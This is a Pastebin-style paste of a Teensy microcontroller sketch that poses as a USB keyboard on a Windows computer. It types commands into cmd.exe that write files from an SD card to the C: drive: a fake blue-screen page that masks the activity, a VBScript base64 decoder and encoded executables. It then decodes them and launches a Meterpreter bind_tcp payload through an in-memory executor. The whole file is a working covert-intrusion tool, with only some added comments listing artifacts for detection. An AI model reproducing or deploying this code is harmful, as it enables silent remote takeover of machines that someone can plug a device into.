
teensyfin

a guest
Sep 12th, 2011
// Idea from Social-Engineer Toolkit Tee Attack Vector
//
// Special thanks to: Irongeek
//
// Edited and adapted by INIT_6 & podjackel
// Gets the payload from an SD card instead of from a server.
//
// A lot of the code was stolen from http://dabermania.blogspot.com/
// Current msfpayload: windows/meterpreter/bind_tcp
//
// ** SD card attached to SPI bus as follows:
// ** MOSI - pin 2
// ** MISO - pin 3
// ** CLK - pin 1
// ** CS - pin 0
  16.  
#include <SdFat.h>
#include <Sd2Card.h>
#include <SdVolume.h>
#include <SdFile.h>
// NOTE(review): presumably the source of CommandAtRunBarMSWIN() and
// PressAndRelease() used in this sketch; neither is defined in this file.
#include <phukdlib.h>

// SPI chip-select pin for the SD card (the "CS - pin 0" line of the wiring
// notes in the file header).
const int chipSelect = 0; //for Teensy 2.0
// Pin of the on-board LED; setup() pulses it for one second when it finishes.
const int ledPin = 11;   // Teensy has LED on 11

// SdFat objects shared by the whole sketch.
// card is also what sdErrorMsg_P() queries for errorCode()/errorData().
Sd2Card card;
// Initialised from card in setup().
SdVolume volume;
// Opened as the root directory of volume in setup().
SdFile root;
// Single file handle, reopened for each file that setup() reads.
SdFile file;

// serial output stream
ArduinoOutStream cout(Serial);

// store error strings in flash
// The macro wraps its argument in PSTR and supplies the trailing ';' itself,
// so call sites work with or without their own semicolon.
#define sdErrorMsg(msg) sdErrorMsg_P(PSTR(msg));
/// Write a message to the serial stream and, when the SD card reports a
/// non-zero error code, follow it with the card's error code and error data.
///
/// @param str  Message pointer handed to pgm(); the sdErrorMsg macro passes a
///             PSTR-wrapped literal here.
void sdErrorMsg_P(const char* str) {
  cout << pgm(str) << endl;

  // Nothing more to report when the card has no error recorded.
  if (!card.errorCode()) {
    return;
  }

  // Both values are printed in hex; the stream is switched back to decimal
  // after the second one.
  cout << pstr("SD errorCode: ") << hex << int(card.errorCode()) << endl;
  cout << pstr("SD errorData: ") << int(card.errorData()) << dec << endl;
}
//----------------------------------------------------------------
  46.  
// Runs once at power-up. Brings up the SD card, then types a fixed command
// sequence through the USB keyboard interface into a Windows command prompt:
//   1. opens cmd.exe and deletes earlier copies of three of its files,
//   2. types bsod.hta from the card into C:\bsod.hta and launches it,
//   3. types decode.txt from the card into C:\decode.vbs with an echo redirect,
//   4. types payload.txt and mexec.txt into C:\ with "copy con",
//   5. runs cscript on decode.vbs to produce C:\mexec.exe and C:\pwn.exe,
//   6. starts C:\mexec.exe with pwn.exe as its argument,
//   7. lights the LED for one second.
// If card, volume or root-directory initialisation fails, the function
// reports the error over serial and returns before typing anything.
//
// Host-side artifacts for detection and triage (all taken from the string
// literals below): C:\bsod.hta, C:\decode.vbs, C:\payload.txt, C:\mexec.txt,
// C:\mexec.exe and C:\pwn.exe in the drive root; a cmd.exe session running
// "del /f", "copy con" and an echo redirect; cscript invoked on
// C:\decode.vbs with a .txt input path and a .exe output path. This sketch
// delivers everything as keyboard input and fetches nothing over the network.
// The file header names the payload as windows/meterpreter/bind_tcp, so a new
// listening TCP port on the host would be expected afterwards; the port
// number is not visible in this file.
void setup(void){
  Serial.begin(9600);

  delay(3000); //Sometimes the drivers can't load fast enough and the script fails.

  // Initialize SdFat or print a detailed error message and halt
  // Use half speed like the native library.
  // change to SPI_FULL_SPEED for more performance.
  if (!card.init(SPI_HALF_SPEED, chipSelect)){
    sdErrorMsg("\ncard.init failed");
    return;
  }

  // initialize a FAT volume
  if (!volume.init(&card)){
    sdErrorMsg("\nvolume.init failed");
    return;
  }

  // open the root directory
  // (no ';' after the call below: the sdErrorMsg macro ends with its own)
  if (!root.openRoot(&volume)){
   sdErrorMsg("\nopenRoot failed")
   return;
  }
// end SD setup.

//Open cmd using phukdlib.h lib
// NOTE(review): CommandAtRunBarMSWIN is not defined in this file; from its
// name it presumably enters the command in the Windows Run dialog - confirm.
   CommandAtRunBarMSWIN("cmd.exe");
   //Delay for cmd to open
   delay(1000);

   //resize cmd window
   //win_ResizeWindow();

   //delete any existing files named bsod.hta, decode.vbs and payload.txt
   Keyboard.print("del /f c:\\bsod.hta c:\\decode.vbs c:\\payload.txt");
   PressAndRelease(KEY_ENTER, 1);

   // open bsod.hta on the SD card; the original comment describes it as a
   // BSOD screen shown "to hide all the non-sense".
   // A failed open is reported over serial; execution continues either way.
   if (file.open(&root, "bsod.hta", O_READ)) {
     Serial.println("Opened bsod.hta");
     }
   else{
     sdErrorMsg("\nfile.open failed");
   }

   //start copy con to place the BSOD page on disk
   Keyboard.print("copy con C:\\bsod.hta");
   PressAndRelease(KEY_ENTER, 1);

   //buffer: b holds each value returned by file.read(); every value is typed
   //as a character and the loop stops at the first value that is not > 0.
   int16_t b;
   while ((b = file.read()) > 0) Keyboard.print((char)b);

   //ctrl-z then press enter to commit copy con changes
   Keyboard.set_modifier(MODIFIERKEY_CTRL);
   PressAndRelease(KEY_Z, 1);
   Keyboard.set_modifier(0);
   PressAndRelease(KEY_ENTER, 1);

   //close file.
   file.close();

   //Run the bsod.hta
   Keyboard.print("C:\\bsod.hta");
   PressAndRelease(KEY_ENTER, 1);

   //Move window off screen.
   //win_MoveWindow();

   // open the file containing the decode VBScript on the SD card.
   // A failed open is reported over serial; execution continues either way.
   if (file.open(&root, "decode.txt", O_READ)) {
     Serial.println("Opened decode.txt");
     }
   else{
     sdErrorMsg("\nfile.open failed");
   }
   //use echo to write the vbscript to c:\decode.vbs
   Keyboard.print("echo ");

   //buffer: n holds each value returned by file.read(); every value is typed
   //as a character and the loop stops at the first value that is not > 0.
   int16_t n;
   while ((n = file.read()) > 0) Keyboard.print((char)n);

   Keyboard.print(" > C:\\decode.vbs");
   PressAndRelease(KEY_ENTER, 1);

   //close file
   file.close();

   //begin copy of payload in base64 to target//
   //open file containing the base64 converted exe
   // A failed open is reported over serial; execution continues either way.
   if (file.open(&root, "payload.txt", O_READ)) {
     Serial.println("Opened payload.txt");
     }
   else{
     sdErrorMsg("\nfile.open failed");
   }

   //start copy con to place the base64 encoded text
   Keyboard.print("copy con C:\\payload.txt");
   PressAndRelease(KEY_ENTER, 1);

   //buffer: t holds each value returned by file.read(); every value is typed
   //as a character and the loop stops at the first value that is not > 0.
   int16_t t;
   while ((t = file.read()) > 0) Keyboard.print((char)t);

   //ctrl-z then press enter to commit copy con changes
   Keyboard.set_modifier(MODIFIERKEY_CTRL);
   PressAndRelease(KEY_Z, 1);
   Keyboard.set_modifier(0);

   PressAndRelease(KEY_ENTER, 1);

   //close file.
   file.close();

   //begin copy of memoryshellexec in base64 to target//
   // A failed open is reported over serial; execution continues either way.
   if (file.open(&root, "mexec.txt", O_READ)) {
     Serial.println("Opened mexec.txt");
     }
   else{
     sdErrorMsg("\nfile.open failed");
   }

   //start copy con to place the base64 encoded text
   Keyboard.print("copy con C:\\mexec.txt");
   PressAndRelease(KEY_ENTER, 1);

   //buffer: q holds each value returned by file.read(); every value is typed
   //as a character and the loop stops at the first value that is not > 0.
   int16_t q;
   while ((q = file.read()) > 0) Keyboard.print((char)q);

   //ctrl-z then press enter to commit copy con changes
   Keyboard.set_modifier(MODIFIERKEY_CTRL);
   PressAndRelease(KEY_Z, 1);
   Keyboard.set_modifier(0);

   PressAndRelease(KEY_ENTER, 1);

   //close file.
   file.close();

//run the vbscript to convert mexec.txt to mexec.exe
   Keyboard.print("cscript C:\\decode.vbs C:\\mexec.txt C:\\mexec.exe");
   PressAndRelease(KEY_ENTER, 1);

//run the vbscript to convert payload.txt to pwn.exe
   Keyboard.print("cscript C:\\decode.vbs C:\\payload.txt C:\\pwn.exe");
   PressAndRelease(KEY_ENTER, 1);
//Run mexec.exe with pwn.exe as its argument.
// NOTE(review): the original comment said the payload executes "directly in
// flash"; given the "memoryshellexec" label above this presumably means in
// memory - confirm.
   Keyboard.print("C:\\mexec.exe pwn.exe");
   PressAndRelease(KEY_ENTER, 1);

//Run the exe directly (disabled)
//   Keyboard.print("C:\\pwn.exe");
//   PressAndRelease(KEY_ENTER, 1);

//Turn LED light on for one sec so you know it's complete.
   pinMode(ledPin, OUTPUT);
   digitalWrite(ledPin, HIGH);
   delay(1000);
   digitalWrite(ledPin, LOW);

}
// Intentionally empty: the sketch has no repeating work.
void loop(void) {
}
  213.  
// Keyboard-only window move: sends Alt+Space, types "m", taps Up 100 times
// with a 5 ms pause before each tap, then presses Enter. On Windows,
// Alt+Space is the window-menu shortcut. The only call to this function in
// setup() is commented out.
void win_MoveWindow(){
  // Alt+Space, followed by an empty report that releases both keys.
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print("m");

  // Each pass is one press-and-release of the Up arrow.
  for (int taps = 0; taps < 100; ++taps) {
    delay(5);
    Keyboard.set_key1(KEY_UP);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
  }

  PressAndRelease(KEY_ENTER, 1);
}
  233.  
// Keyboard-only window resize: sends Alt+Space, types "s", taps Left and Up
// once each, then taps Right and Down 75 times each (5 ms pause before every
// pair) and presses Enter. On Windows, Alt+Space is the window-menu shortcut.
// The only call to this function in setup() is commented out.
void win_ResizeWindow(){
  // Alt+Space, followed by an empty report that releases both keys.
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print("s");

  // One tap of Left, then one tap of Up.
  Keyboard.set_key1(KEY_LEFT);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_UP);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();

  // Each pass taps Right and then Down.
  for (int steps = 0; steps < 75; ++steps) {
    delay(5);
    Keyboard.set_key1(KEY_RIGHT);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_DOWN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
  }

  PressAndRelease(KEY_ENTER, 1);
}